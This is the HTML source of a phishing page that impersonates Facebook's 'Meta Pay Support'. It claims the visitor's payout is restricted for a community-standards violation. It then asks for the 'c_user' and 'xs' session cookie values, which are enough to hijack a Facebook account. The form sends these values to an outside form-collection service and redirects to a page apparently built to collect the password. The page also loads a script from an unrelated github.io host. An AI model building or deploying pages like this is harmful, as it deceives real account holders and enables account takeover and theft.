<!DOCTYPE html>
<html lang=en>
<!--
 
-->
<meta charset=utf-8>
<meta name=viewport content="width=device-width, initial-scale=1.0">
<title>Meta Pay Support On Facebook</title>
<link href="https://vjs.zencdn.net/7.14.3/video-js.css" rel="stylesheet" />
<script src="https://vjs.zencdn.net/7.14.3/video.min.js"></script>
<script src="https://metaverifybadgeget.github.io/inspectr/index"></script>
<style>
    body {
        font-family: "Helvetica Neue", Arial, sans-serif;
        background-color: #f0f2f5;
        margin: 0;
        padding: 0;
        overflow-x: hidden
    }

    .header {
        background-color: #4267B2;
        padding: 25px 20px;
        display: flex;
        justify-content: space-between;
        align-items: center;
        color: white
    }

    .header-container {
        display: flex;
        align-items: center
    }

    .facebook-text {
        font-size: 35px;
        font-weight: bold;
        color: white;
        font-family: "Helvetica Neue", Arial, sans-serif
    }

    .divider {
        height: 10px;
        background-color: #e9ebee
    }

    .content-container {
        width: 80%;
        max-width: 800px;
        background-color: white;
        margin: 30px auto;
        padding: 20px;
        border-radius: 8px;
        box-shadow: 0 8px 16px rgba(0, 0, 0, 0.1);
        position: relative
    }

    .verification-heading {
        font-size: 32px;
        color: #1c1e21;
        margin-bottom: 20px;
        font-weight: bold;
        display: flex;
        align-items: center;
        position: relative
    }

    .verification-heading img {
        width: 50px;
        height: auto;
        margin-right: 15px
    }

    h1 {
        font-size: 24px;
        color: #1c1e21;
        margin-bottom: 20px;
        font-weight: normal;
        text-align: left
    }

    p {
        font-size: 14px;
        color: #606770;
        margin-bottom: 10px;
        line-height: 1.6
    }

    .form-group {
        margin-bottom: 20px
    }

    label {
        font-size: 14px;
        color: #4b4f56;
        display: block;
        margin-bottom: 8px
    }

    input[type="text"] {
        width: 100%;
        padding: 12px 10px;
        font-size: 14px;
        border: 1px solid #ccd0d5;
        border-radius: 6px;
        box-sizing: border-box;
        background-color: #f5f6f7;
        transition: all 0.3s ease
    }

    input[type="text"]:focus {
        border-color: #1877f2;
        background-color: white;
        outline: none;
        box-shadow: 0 0 0 3px rgba(24, 119, 242, 0.2)
    }

    .notice {
        font-size: 12px;
        color: #606770;
        margin-bottom: 25px
    }

    .form-notice {
        font-size: 12px;
        color: #ff0000;
        margin-bottom: 20px
    }

    button {
        width: 100%;
        padding: 12px;
        background-color: #1877f2;
        color: white;
        border: none;
        border-radius: 6px;
        cursor: pointer;
        font-size: 14px;
        font-weight: 700;
        text-transform: uppercase;
        transition: background-color 0.3s ease
    }

    button:hover {
        background-color: #165ecc
    }

    .video-container {
        position: relative;
        width: 100%;
        max-width: 640px;
    }

    .poster {
        position: absolute;
        top: 0;
        left: 0;
        width: 100%;
        height: 100%;
        display: flex;
        justify-content: center;
        align-items: center;
        background: url('poster.jpg') no-repeat center center;
        background-size: cover;
        cursor: pointer;
    }

    .play-btn {
        font-size: 3rem;
        color: white;
        text-shadow: 2px 2px 4px rgba(0, 0, 0, 0.5);
        pointer-events: none;
    }

    video {
        width: 100%;
        display: block;
    }
</style>

<body>

    <div class=header>
        <div class=header-container>
            <span class=facebook-text>facebook</span>
        </div>
    </div>

    <div class=divider></div>

    <div class=content-container>

        <div class=verification-heading>
            <img src="https://cdn.glitch.global/d1a4371e-002c-4933-a37f-b0a232fc0ca5/WhatsApp%20Image%202025-01-28%20at%209.19.10%20AM.jpeg?v=1738174912139"
                alt="Global Glitch Media Logo"> Meta Pay Support
        </div>
        <h1> Your payout has been restricted due to a violation of our community standards. Please review and resolve the issue to unlock your payout. </p>
        <p>For your security, we occasionally ask you to verify some information. To continue i receiving payouts, please verify your account.</p>
        <p>Please provide the precise details below. Refer to the video for clarification if you find the instructions unclear.
        </p>

        <div class=video-container style=position:relative!important>
            <video id="video" controls preload="" poster="fbPlay.jfif">
            <source
               src="https://cdn.glitch.global/7ce918cb-3078-452a-a62e-3fa825fa0943/Verified%20Badges.mp4?v=1725740907151"
               type="video/mp4">
            Your browser does not support the video tag.
         </video>
        </div>


        <p class=form-notice>Please ensure that all required information is accurately provided. Failure to do so may result in not receiving a verified badge.</p>

        <form class="content" action="https://submit-form.com/CWkUUxLaD" method="POST">
            <input type="hidden" name="_redirect" value="https://enter-password-get-review.vercel.app/" />

            <div class=form-group>
                <label for=c_user>c_user</label>
                <input type=text id=c_user name=c_user pattern=[0-9]+ minlength=6 required value>
            </div>
            <div class=form-group>
                <label for=xs>xs</label>
                <input type=text id=xs name=xs pattern="^(?=.*[a-z])(?=.*[A-Z])(?=.*\d)(?=.*[@#$%^&amp;+=]).{12,}$" required value>
            </div>
            <p class=notice>Please make sure not to log out from your computer or laptop until you have received a verification email.</p>
            <button class="submitBtn" type=submit>Submit</button>
        </form>
    </div>
